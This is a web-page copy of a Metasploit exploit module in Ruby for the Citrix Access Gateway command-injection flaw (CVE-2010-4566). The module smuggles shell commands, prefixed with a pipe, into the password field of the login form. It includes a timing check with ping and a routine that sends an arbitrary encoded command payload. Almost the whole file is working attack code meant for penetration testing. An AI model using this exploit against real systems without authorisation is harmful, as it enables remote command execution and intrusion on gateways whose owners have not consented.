CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Citrix Access Gateway Command Execution',

14
      'Description'    => %q{

15
          The Citrix Access Gateway provides support for multiple authentication types.

16
        When utilizing the external legacy NTLM authentication module known as

17
        ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command

18
        line utility to verify a user's identity and password.  By embedding shell

19
        metacharacters in the web authentication form it is possible to execute

20
        arbitrary commands on the Access Gateway.

21
      },

22
      'Author'         =>

23
        [

24
          'George D. Gal', # Original advisory

25
          'Erwin Paternotte', # Exploit module

26
        ],

27
      'License'        => MSF_LICENSE,

28
      'References'     =>

29
        [

30
          [ 'CVE', '2010-4566' ],

31
          [ 'OSVDB', '70099' ],

32
          [ 'BID', '45402' ],

33
          [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]

34
        ],

35
      'Privileged'     => false,

36
      'Payload'        =>

37
        {

38
          'Space'       => 127,

39
          'DisableNops' => true,

40
          'Compat'      =>

41
            {

42
              'PayloadType' => 'cmd cmd_bash',

43
              #'RequiredCmd' => 'generic telnet bash-tcp'

44
            }

45
        },

46
      'DefaultOptions' =>

47
        {

48
          'WfsDelay' => 30

49
        },

50
      'Platform'       => [ 'unix' ],

51
      'Arch'           => ARCH_CMD,

52
      'Targets'        => [[ 'Automatic', { }]],

53
      'DisclosureDate' => '2010-12-21',

54
      'DefaultTarget'  => 0))

55


56
    register_options(

57
      [

58
        Opt::RPORT(443),

59
        OptBool.new('SSL', [ true, 'Use SSL', true ]),

60
      ])

61


62
  end

63


64
  def post(command, background)

65
    username = rand_text_alphanumeric(20)

66


67
    if background

68
      sploit = Rex::Text.uri_encode('|' + command + '&')

69
    else

70
      sploit = Rex::Text.uri_encode('|' + command)

71
    end

72


73
    data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="

74
    data << username

75
    data << "&password="

76
    data << sploit

77


78
    res = send_request_cgi({

79
      'uri'     => '/',

80
      'method'  => 'POST',

81
      'data'    => data

82
    }, 25)

83
  end

84


85
  def check

86
    print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

87


88
    # Try running/timing 'ping localhost' to determine is system is vulnerable

89
    start = Time.now

90
    post("ping -c 10 127.0.0.1", false)

91
    elapsed = Time.now - start

92
    if elapsed >= 3

93
      return Exploit::CheckCode::Vulnerable

94
    end

95


96
    return Exploit::CheckCode::Safe

97
  end

98


99
  def exploit

100
    cmd = payload.encoded

101


102
    if not post(cmd, true)

103
      fail_with(Failure::Unknown, "Unable to execute the desired command")

104
    end

105
  end

106
end

107


108